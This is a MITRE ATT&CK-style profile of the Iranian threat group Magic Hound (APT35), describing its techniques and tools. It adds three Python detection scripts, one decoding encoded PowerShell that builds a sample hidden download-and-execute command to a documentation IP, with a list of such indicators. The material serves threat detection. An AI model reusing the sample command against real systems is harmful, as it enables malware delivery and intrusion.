Magic Hound

Magic Hound is an Iranian-sponsored threat group that conducts long-term, resource-intensive intelligence-collection operations dating back to at least 2014. The group typically targets U.S. and Middle Eastern military organizations, as well as other organizations with government personnel, via complex social engineering campaigns.[1]

ID: G0059
Associated Groups: Cobalt Gypsy, Operation Woolen-Goldfish, Ajax Security Team, Operation Saffron Rose, Rocket Kitten, Phosphorus, Newscaster, APT35
Contributors: Bryan Lee
Version: 2.0
Created: 16 January 2018
Last Modified: 04 July 2020

Associated Group Descriptions

Name Description
Cobalt Gypsy

Based on overlapping hash values in reporting, Magic Hound activity appears to overlap with activity conducted by the group known as Cobalt Gypsy.[2]

Operation Woolen-Goldfish

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Woolen-Goldfish.[3]

Ajax Security Team

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the group Ajax Security Team.[3]

Operation Saffron Rose

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the campaign Operation Saffron Rose.[3]

Rocket Kitten

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the adversary group Rocket Kitten.[3][4]

Phosphorus

[5]

Newscaster

Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).[3][1]

APT35

[1]

Techniques Used

Domain ID Name Use
Enterprise T1098 .002 Account Manipulation: Exchange Email Delegate Permissions

Magic Hound granted compromised email accounts read access to the mailboxes of additional targeted accounts. The group was then able to authenticate to the intended victim's OWA (Outlook Web Access) portal with the compromised account and read hundreds of email communications for information on Middle East organizations.[1]
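The delegate grants described above leave a trail in the Exchange admin audit log (Add-MailboxPermission / Add-MailboxFolderPermission entries). The following hunt is an added example, not code from the MITRE page or from any Magic Hound report: the records are constructed to mirror the objects that Exchange's Search-AdminAuditLog cmdlet returns (CmdletName, CmdletParameters as Name/Value pairs, Caller, ObjectModified), and the mailboxes, accounts and grants are invented. It flags any grant that gives one account read access to another account's mail, and marks grants where the caller handed access to itself as the strongest signal.

```python
"""Hunt for mailbox delegate grants of the kind described under T1098.002.

Added example; not code from the MITRE page or from any vendor report.
The records below are constructed to mirror the objects that Exchange's
Search-AdminAuditLog cmdlet returns (CmdletName, CmdletParameters as
Name/Value pairs, Caller, ObjectModified); the mailboxes and grants are
invented.
"""
from dataclasses import dataclass
from typing import Dict, List

# Cmdlets that give one account access to another account's mailbox or folders.
DELEGATION_CMDLETS = {"Add-MailboxPermission", "Add-MailboxFolderPermission"}
# Access rights that let the grantee read the target's mail (free/busy-only rights are excluded).
READ_RIGHTS = {"FullAccess", "ReadPermission", "Reviewer", "Editor", "Owner",
               "PublishingEditor", "Author", "NonEditingAuthor"}

SAMPLE_AUDIT_RECORDS: List[Dict] = [  # constructed sample data
    {"CmdletName": "Add-MailboxPermission", "Caller": "corp\\exadmin",
     "ObjectModified": "victim.one@example.com",
     "CmdletParameters": [{"Name": "Identity", "Value": "victim.one@example.com"},
                          {"Name": "User", "Value": "corp\\staff.compromised"},
                          {"Name": "AccessRights", "Value": "FullAccess"}]},
    {"CmdletName": "Add-MailboxFolderPermission", "Caller": "corp\\staff.compromised",
     "ObjectModified": "victim.two@example.com:\\Inbox",
     "CmdletParameters": [{"Name": "Identity", "Value": "victim.two@example.com:\\Inbox"},
                          {"Name": "User", "Value": "corp\\staff.compromised"},
                          {"Name": "AccessRights", "Value": "Reviewer"}]},
    {"CmdletName": "Add-MailboxFolderPermission", "Caller": "corp\\exadmin",
     "ObjectModified": "victim.three@example.com:\\Calendar",
     "CmdletParameters": [{"Name": "Identity", "Value": "victim.three@example.com:\\Calendar"},
                          {"Name": "User", "Value": "Default"},
                          {"Name": "AccessRights", "Value": "AvailabilityOnly"}]},
    {"CmdletName": "Set-Mailbox", "Caller": "corp\\exadmin",
     "ObjectModified": "victim.one@example.com",
     "CmdletParameters": [{"Name": "Identity", "Value": "victim.one@example.com"},
                          {"Name": "ProhibitSendQuota", "Value": "2 GB"}]},
]


@dataclass
class Finding:
    caller: str
    target_mailbox: str
    grantee: str
    rights: str
    self_granted: bool  # the caller granted the access to its own account


def _params(record: Dict) -> Dict[str, str]:
    return {p["Name"]: p["Value"] for p in record.get("CmdletParameters", [])}


def find_delegate_grants(records: List[Dict]) -> List[Finding]:
    findings: List[Finding] = []
    for rec in records:
        if rec.get("CmdletName") not in DELEGATION_CMDLETS:
            continue
        p = _params(rec)
        grantee = p.get("User", "")
        rights = {r.strip() for r in p.get("AccessRights", "").split(",")}
        # Folder identities look like "user@domain:\Inbox"; keep only the mailbox part.
        target = p.get("Identity", rec.get("ObjectModified", "")).split(":")[0]
        if not rights & READ_RIGHTS:
            continue  # no read access granted: not the pattern we are hunting
        caller = rec.get("Caller", "")
        findings.append(Finding(caller, target, grantee, ",".join(sorted(rights)),
                                self_granted=caller.lower() == grantee.lower()))
    return findings


if __name__ == "__main__":
    for f in find_delegate_grants(SAMPLE_AUDIT_RECORDS):
        print(f)
```

In practice the input would be the JSON export of Search-AdminAuditLog (or the equivalent Unified Audit Log records in Microsoft 365) filtered to the two cmdlets; admin audit logging has to be enabled for the entries to exist at all. Pair the grant finding with OWA or mailbox audit records showing the grantee opening the delegated mailbox, which is the second half of the behaviour described above.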

Enterprise T1071 Application Layer Protocol

Magic Hound malware has used IRC for C2.[3]

.001 Web Protocols

Magic Hound malware has used HTTP for C2.[3]

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

Magic Hound has used RAR to stage and compress local folders.[1]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Magic Hound malware has used Registry Run keys to establish persistence.[3]

Enterprise T1059 .005 Command and Scripting Interpreter: Visual Basic

Magic Hound malware has used VBS scripts for execution.[3]

.003 Command and Scripting Interpreter: Windows Command Shell

Magic Hound has used the command-line interface.[3]

.001 Command and Scripting Interpreter: PowerShell

Magic Hound has used PowerShell for execution and privilege escalation.[3][1]

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

Magic Hound used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage.[6]

Enterprise T1114 .001 Email Collection: Local Email Collection

Magic Hound has collected .PST archives.[1]

Enterprise T1083 File and Directory Discovery

Magic Hound malware can list a victim's logical drives and their type, as well as the total and free space of fixed devices. Other malware can list a directory's contents.[3]

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Magic Hound malware has a function to determine whether the C2 server wishes to execute the newly dropped file in a hidden window.[3]

Enterprise T1070 .004 Indicator Removal on Host: File Deletion

Magic Hound has deleted and overwritten files to cover its tracks.[3][1]

Enterprise T1105 Ingress Tool Transfer

Magic Hound has downloaded additional code and files from servers onto victims.[3] Magic Hound used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.[6]

Enterprise T1056 .001 Input Capture: Keylogging

Magic Hound malware is capable of keylogging.[3] Magic Hound used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.[6]

Enterprise T1571 Non-Standard Port

Magic Hound malware has communicated with its C2 server over TCP port 4443 using HTTP.[3]
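HTTP on TCP 4443 is easy to miss if detection keys on port numbers alone. The following is an added example, not from the MITRE page or from any Magic Hound report: it parses a constructed excerpt of a Zeek conn.log (TSV format, a subset of the real #fields; hosts, ports and UIDs are invented, with 203.0.113.0/24 being a documentation range) and flags sessions that Zeek's protocol detection labelled as http on a port where plaintext HTTP is not expected. The expected-port set is an assumption about the environment.

```python
"""Find HTTP sessions on non-standard ports (T1571 with T1071.001).

Added example; not from the MITRE page or from any Magic Hound report.
SAMPLE_CONN_LOG is a constructed excerpt in Zeek conn.log TSV format with a
subset of the real #fields; hosts, ports and UIDs are invented.
"""
from typing import Dict, Iterable, List, Tuple

# Ports on which plaintext HTTP is expected in this (assumed) environment.
EXPECTED_HTTP_PORTS = {80, 8080, 8000}

SAMPLE_CONN_LOG = """\
#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes
#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tinterval\tcount\tcount
1586000000.100\tCa1\t10.0.0.5\t51234\t203.0.113.10\t80\ttcp\thttp\t1.2\t400\t2000
1586000001.200\tCa2\t10.0.0.5\t51240\t203.0.113.20\t4443\ttcp\thttp\t300.5\t9000\t1200
1586000002.300\tCa3\t10.0.0.7\t51301\t203.0.113.30\t4443\ttcp\tssl\t2.0\t800\t3000
1586000003.400\tCa4\t10.0.0.9\t51350\t203.0.113.40\t8080\ttcp\thttp\t0.9\t300\t900
1586000004.500\tCa5\t10.0.0.5\t51360\t203.0.113.20\t4443\ttcp\t-\t0.1\t0\t0
1586000060.000\tCa6\t10.0.0.5\t51372\t203.0.113.20\t4443\ttcp\thttp\t280.0\t8800\t1100
"""


def parse_zeek_tsv(text: str) -> List[Dict[str, str]]:
    """Parse Zeek's TSV log format: the '#fields' line names the columns,
    other '#' lines are metadata, everything else is one record per line."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#"):
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def http_on_odd_ports(rows: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Zeek assigns 'service' by protocol detection, not by port, so a record
    with service=http and id.resp_p=4443 is exactly the pattern in the text.
    TLS on 4443 (service=ssl) is not flagged here; that needs a different check."""
    return [r for r in rows
            if r.get("service") == "http" and int(r["id.resp_p"]) not in EXPECTED_HTTP_PORTS]


def summarize(hits: Iterable[Dict[str, str]]) -> Dict[Tuple[str, str, str], int]:
    """Count hits per (source, destination, port): repeated sessions to one
    host on one odd port stand out more than a single stray connection."""
    counts: Dict[Tuple[str, str, str], int] = {}
    for r in hits:
        key = (r["id.orig_h"], r["id.resp_h"], r["id.resp_p"])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    hits = http_on_odd_ports(parse_zeek_tsv(SAMPLE_CONN_LOG))
    for key, n in summarize(hits).items():
        print(key, n)
```

The same logic applies to any sensor that identifies the application protocol independently of the port (Suricata's app_proto field, for example); a port-based allow list alone would have passed the 4443 traffic as generic TCP.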

Enterprise T1027 Obfuscated Files or Information

Magic Hound malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.[3]
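Base64-encoded commands are only opaque until someone decodes them, and PowerShell's -EncodedCommand has a fixed encoding (UTF-16LE, then base64) that makes this mechanical. The following is an added example serving both the PowerShell execution row above (T1059.001) and this T1027 row; it is not code from the MITRE page or from any Magic Hound report. The process creation command lines are constructed here (their payloads are produced by the block's own ps_encode, so they decode exactly as powershell.exe would decode them), the URL uses a documentation address range, and the indicator list is a generic set of download-and-execute markers, not a Magic Hound signature. The block also unwraps a second base64 layer hidden in a FromBase64String('...') literal, which the T1027 row's wording (encoded commands and files) makes worth handling.

```python
"""Decode base64-encoded PowerShell command lines (T1027 with T1059.001).

Added example; not from the MITRE page or any Magic Hound report. The
command lines in SAMPLE_COMMAND_LINES are constructed here; the indicator
list is generic and not a signature for this group.
"""
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) and also -ec.
ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}
# A second base64 layer is commonly wrapped as [Convert]::FromBase64String('...').
INNER_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
INDICATORS = ("invoke-expression", "iex", "downloadstring", "downloadfile",
              "net.webclient", "-w hidden", "windowstyle hidden")


def ps_encode(script: str) -> str:
    """Encode as powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded(cmdline: str) -> Optional[str]:
    """Return the argument that follows an -EncodedCommand style switch, if any."""
    argv = cmdline.split()
    for i, tok in enumerate(argv[:-1]):
        if tok[:1] in "-/" and tok[1:].lower() in ENC_FLAGS:
            return argv[i + 1].strip("'\"")
    return None


def _decode_bytes(raw: bytes) -> str:
    # Heuristic: a NUL as the second byte means UTF-16LE text, otherwise assume UTF-8.
    enc = "utf-16-le" if raw[1:2] == b"\x00" else "utf-8"
    return raw.decode(enc, errors="replace")


def decode_layers(b64: str) -> List[str]:
    """The outer layer is always UTF-16LE; nested FromBase64String literals are decoded too."""
    try:
        outer = base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return []
    layers = [outer]
    for m in INNER_B64.finditer(outer):
        try:
            layers.append(_decode_bytes(base64.b64decode(m.group(1), validate=True)))
        except ValueError:
            continue
    return layers


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode what can be decoded and report which generic indicators appear
    anywhere in the visible command line or the decoded layers."""
    encoded = extract_encoded(cmdline)
    layers = decode_layers(encoded) if encoded else []
    haystack = (cmdline + "\n" + "\n".join(layers)).lower()
    return {"encoded": encoded, "layers": layers,
            "indicators": [k for k in INDICATORS if k in haystack]}


# Constructed process creation command lines (what Sysmon event 1 / 4688 would carry).
_inner = "(New-Object Net.WebClient).DownloadFile('http://203.0.113.20:4443/p.exe','p.exe')"
_outer = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(_inner.encode()).decode() + "')))")
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -W Hidden -Enc " + ps_encode(_outer),
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for c in SAMPLE_COMMAND_LINES:
        print(analyze(c))
```

Run this over command lines from process creation telemetry rather than over a static sample; the value is that an alert on the decoded text (DownloadFile to an odd port, IEX of a nested layer) is far more specific than an alert on the mere presence of -Enc, which many legitimate management tools also use.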

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

Magic Hound stole domain credentials from a Microsoft Active Directory domain controller and leveraged Mimikatz.[1]

Enterprise T1566 .002 Phishing: Spearphishing Link

Magic Hound sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that executed PowerShell scripts to download Pupy.

.001 Phishing: Spearphishing Attachment

Magic Hound has used personalized spearphishing attachments.[6]

.003 Phishing: Spearphishing via Service

Magic Hound used various social media channels to spearphish victims.[7][8][5]

Enterprise T1057 Process Discovery

Magic Hound malware can list running processes.[3]

Enterprise T1113 Screen Capture

Magic Hound malware can take a screenshot and upload the file to its C2 server.[3]

Enterprise T1082 System Information Discovery

Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.[3]

Enterprise T1016 System Network Configuration Discovery

Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address.[3]

Enterprise T1033 System Owner/User Discovery

Magic Hound malware has obtained the victim username and sent it to the C2 server.[3]

Enterprise T1204 .002 User Execution: Malicious File

Magic Hound has lured victims into executing malicious files.[7]

Enterprise T1102 .002 Web Service: Bidirectional Communication

Magic Hound malware can use a SOAP Web service to communicate with its C2 server.[3]

Software

ID Name References Techniques
S0186 DownPaper [4] Application Layer Protocol: Web Protocols, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Query Registry, System Information Discovery, System Owner/User Discovery
S0224 Havij [6] Exploit Public-Facing Application
S0002 Mimikatz [1] Access Token Manipulation: SID-History Injection, Account Manipulation, Boot or Logon Autostart Execution: Security Support Provider, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores, OS Credential Dumping: LSASS Memory, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets, Rogue Domain Controller, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Kerberos Tickets: Golden Ticket, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket
S0029 PsExec [1] Lateral Tool Transfer, Remote Services: SMB/Windows Admin Shares, System Services: Service Execution
S0192 Pupy [3][1] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Token Impersonation/Theft, Account Discovery: Local Account, Application Layer Protocol: Web Protocols, Archive Collected Data: Archive via Utility, Audio Capture, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Python, Create Account: Local Account, Create Account: Domain Account, Create or Modify System Process: Systemd Service, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Email Collection: Local Email Collection, Encrypted Channel: Asymmetric Cryptography, Exfiltration Over C2 Channel, File and Directory Discovery, Indicator Removal on Host: Clear Windows Event Logs, Ingress Tool Transfer, Input Capture: Keylogging, Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Network Service Scanning, Network Share Discovery, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, OS Credential Dumping: Cached Domain Credentials, Process Discovery, Process Injection: Dynamic-link Library Injection, Remote Services: Remote Desktop Protocol, Screen Capture, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Services: Service Execution, Unsecured Credentials: Credentials In Files, Use Alternate Authentication Material: Pass the Ticket, Video Capture, Virtualization/Sandbox Evasion: System Checks
S0225 sqlmap [6] Exploit Public-Facing Application

References